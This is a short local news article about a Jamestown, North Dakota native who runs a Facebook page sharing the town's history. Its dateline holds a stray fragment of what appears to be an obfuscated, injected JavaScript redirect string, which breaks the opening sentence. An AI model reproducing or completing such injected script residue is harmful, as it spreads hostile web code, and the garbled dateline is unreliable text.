JAMESTOWN, akfzb|var|u0026u|referrer|rhnst||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – It started as just an interest and love for Jamestown.

Jason Grabinger, a Jamestown native, was born in 1982. When his parents found jobs in St. Cloud, Jason had to move with them.

“I was 7 and in 2nd grade at the time.” Jason said.

That didn’t stop Jason from continuing his interest in the history of Jamestown.

“I have read my copy of “Century of Stories” so many times that the pages are falling out and the corners are all rounded. When I was still very young, shortly after moving, I would study the book, do research however I could (however this was pre-internet), and write about Jamestown history or even write historical fiction set in Jamestown and written around real events and people that I learned about. My grandmother has saved clippings from the Prairie Post and the Jamestown Sun for years.”

With his passion for Jamestown history strong, Jason wanted to reach out and connect with others that were deeply interested in Jamestown’s deep, historical beginnings.

“I decided I would start my own Facebook page dedicated to such a project. I knew that to really be great, there needed to be people interested in the site and posting and sharing. I have been sharing at least one little snapshot a day, and the more people who are visiting, the more great communication and photos we will have on the page.”

Jason hopes the new page will continue to grow as people from Jamestown and those who have moved all over the country and world contribute to the page.

“It is my hope that the site would be a real blessing to people and a real source of enjoyment and reminiscence.”

Jason currently lives in Sauk Rapids, MN. The page can be found here.
